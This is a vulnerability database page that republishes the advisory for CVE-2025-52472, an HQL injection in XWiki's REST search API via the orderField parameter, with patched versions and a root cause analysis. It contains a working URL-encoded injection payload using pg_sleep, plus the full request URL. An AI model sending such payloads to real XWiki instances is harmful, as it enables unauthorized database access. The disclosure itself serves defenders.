N/A

CVSS Score

-

CVSS Score

Basic Information

CVE ID

CVE-2025-52472

GHSA ID

GHSA-gprp-h92g-gc2h

EPSS Score

CWE

CWE-89

Published

10/6/2025

Updated

10/6/2025

KEV Status

Technology

Java

Basic Information

CVE ID

GHSA ID

EPSS Score

CWE

Published

Updated

KEV Status

Technology

Concerned about an active attack path?

Talk to our security experts and see Miggo in action.

Miggo Vulnerability Database

→

CVE-2025-52472

CVE-2025-52472: XWiki Platform is vulnerable to HQL injection via wiki and space search REST API

Impact

The REST search URL is vulnerable to HQL injection via the orderField parameter. The specified value is added twice in the query, though, once in the field list for the select and once in the order clause, so it's not that easy to exploit. The part of the query between the two fields can be enclosed in single quotes to effectively remove them, but the query still needs to remain valid with the query two times in it.

For example, with the following orderField parameter:

doc.fullName%20from%20XWikiDocument%20as%20doc%20where%20%24%24%3D'%24%24%3Dconcat(chr(61)%2Cchr(39))%20and%20version()%7C%7Cpg_sleep(1)%3Dversion()%7C%7Cpg_sleep(1)%20and%20(1%3D1%20or%20%3F%3D%3F%20or%20%3F%3D%3F%20or%20%3F%3D%3F%20or%20%3F%3D%3F%20or%20%3F%3D%3F)%20--%20comment'%20or%20a%3D'%20order%20by%20doc.fullName

See the following error:

QuerySyntaxException: unexpected token: $$ near line 1, column 518 [select distinct doc.fullName, doc.space, doc.name, doc.language, doc.doc.fullName from com.xpn.xwiki.doc.XWikiDocument as doc where (doc.hidden <> true or doc.hidden is null) and ($$='$$=concat(chr(61),chr(39)) and version()||pg_sleep(1)=version()||pg_sleep(1) and (1=1 or ?=? or ?=? or ?=? or ?=? or ?=?) -- comment' or a=') order by doc.fullName from com.xpn.xwiki.doc.XWikiDocument as doc  where ( (upper(doc.title) like :keywords) ) order by doc.doc.fullName from com.xpn.xwiki.doc.XWikiDocument as doc where $$='$$=concat(chr(61),chr(39)) and version()||pg_sleep(1)=version()||pg_sleep(1) and (1=1 or ?=? or ?=? or ?=? or ?=? or ?=?) -- comment' or a=' order by doc.fullName asc]

For reference, the full URL for the above error is:

http://localhost:8080/xwiki/rest/wikis/xwiki/search?q=test&scope=title&orderField=doc.fullName%20from%20XWikiDocument%20as%20doc%20where%20%24%24%3D%27%24%24%3Dconcat(chr(61)%2Cchr(39))%20and%20version()%7C%7Cpg_sleep(1)%3Dversion()%7C%7Cpg_sleep(1)%20and%20(1%3D1%20or%20%3F%3D%3F%20or%20%3F%3D%3F%20or%20%3F%3D%3F%20or%20%3F%3D%3F%20or%20%3F%3D%3F)%20--%20comment%27%20or%20a%3D%27%20order%20by%20doc.fullName

Patches

This has been patched in 17.5.0, 17.4.2, 16.10.9.

Workarounds

There is no known workaround, other than upgrading XWiki.

Resources

https://jira.xwiki.org/browse/XWIKI-23247
https://github.com/xwiki/xwiki-platform/commit/743ebf8696ffa55161ed2c5ecf26b09f69e6bcf1
https://github.com/xwiki/xwiki-platform/commit/a45eca2af772abb7324e56d7fd2df1ac937bc445

For more information

If you have any questions or comments about this advisory:

Open an issue in Jira XWiki.org
Email us at Security Mailing List

(GitHub Advisory)

Miggo Vulnerability Database

→

CVE-2025-52472

CVE-2025-52472:

N/A

CVSS Score

-

CVSS Score

Basic Information

CVE ID

CVE-2025-52472

GHSA ID

GHSA-gprp-h92g-gc2h

EPSS Score

CWE

CWE-89

Published

10/6/2025

Updated

10/6/2025

KEV Status

Technology

Java

Basic Information

CVE ID

GHSA ID

EPSS Score

CWE

Published

Updated

KEV Status

Technology

Technical Details

CVSS Vector

Package Name	Ecosystem	Vulnerable Versions	First Patched Version
org.xwiki.platform:xwiki-platform-rest-server	maven	>= 17.0.0-rc-1, < 17.4.2	17.4.2
org.xwiki.platform:xwiki-platform-rest-server	maven	>= 4.3-milestone-1, < 16.10.9	16.10.9

Technical Details

Vulnerability Intelligence
Miggo AI

Root Cause Analysis

The vulnerability is an HQL injection flaw within the XWiki Platform's REST API, specifically in functions that handle searching and historical data retrieval. The root cause is the improper construction of HQL queries where user-controlled parameters, orderField and order, were concatenated directly into the query string for sorting purposes without adequate sanitization.

The analysis of the provided patches shows two main areas of weakness:

orderField Injection: In search-related functions like DatabaseKeywordSearchSource.searchPages and DatabaseKeywordSearchSource.searchObjects, the orderField parameter was used to specify a field for sorting. The patch introduced a check to ensure this field name is alphanumeric. Before this, an attacker could supply a malicious HQL snippet in orderField, which would be embedded into the query, leading to arbitrary HQL execution.
order Injection: In several resource implementation classes (ModificationsResourceImpl, PageHistoryResourceImpl, PageTranslationHistoryResourceImpl), the order parameter (meant for 'asc' or 'desc') was used directly in the query. The patch replaces the direct usage with a call to a new utility function, HqlQueryUtils.getValidQueryOrder, which strictly validates the input.

By identifying the functions where these parameters were used insecurely, we can pinpoint the exact locations in the code that are vulnerable. During an exploit, these functions would be present in the runtime profile as they are responsible for processing the malicious request and constructing the injected HQL query.

Vulnerable functions

Only Mi**o us*rs **n s** t*is s**tion

WAF Protection Rules

WAF Rule

W** rul*s *v*il**l* *or Mi**o *ustom*rs only.W** rul*s *v*il**l* *or Mi**o *ustom*rs only.W** rul*s *v*il**l* *or Mi**o *ustom*rs only.W** rul*s *v*il**l* *or Mi**o *ustom*rs only.W** rul*s *v*il**l* *or Mi**o *ustom*rs only.W** rul*s *v*il**l* *or Mi**o *ustom*rs only.W** rul*s *v*il**l* *or Mi**o *ustom*rs only.W** rul*s *v*il**l* *or Mi**o *ustom*rs only.W** rul*s *v*il**l* *or Mi**o *ustom*rs only.W** rul*s *v*il**l* *or Mi**o *ustom*rs only.

Reasoning

*v*il**l* *or Mi**o *ustom*rs only.*v*il**l* *or Mi**o *ustom*rs only.*v*il**l* *or Mi**o *ustom*rs only.*v*il**l* *or Mi**o *ustom*rs only.*v*il**l* *or Mi**o *ustom*rs only.*v*il**l* *or Mi**o *ustom*rs only.*v*il**l* *or Mi**o *ustom*rs only.*v*il**l* *or Mi**o *ustom*rs only.*v*il**l* *or Mi**o *ustom*rs only.*v*il**l* *or Mi**o *ustom*rs only.

N/A

-

Basic Information

Basic Information

Concerned about an active attack path?

CVE-2025-52472: XWiki Platform is vulnerable to HQL injection via wiki and space search REST API

Impact

Patches

Workarounds

Resources

For more information

CVE-2025-52472:

N/A

-

Basic Information

Basic Information

Technical Details

Technical Details

Vulnerability IntelligenceMiggo AI

Root Cause Analysis

Vulnerable functions

WAF Protection Rules

WAF Rule

Reasoning

Vulnerability IntelligenceMiggo AI

Technical Details

CVE-2025-52472: XWiki Platform is vulnerable to HQL injection via wiki and space search REST API

Impact

Patches

Workarounds

Resources

For more information

Basic Information

Basic Information

Vulnerability IntelligenceMiggo AI

Root Cause Analysis

Vulnerable functions

WAF Protection Rules

WAF Rule

Reasoning

N/A

N/A

Vulnerability Intelligence
Miggo AI

Vulnerability Intelligence
Miggo AI

Vulnerability Intelligence
Miggo AI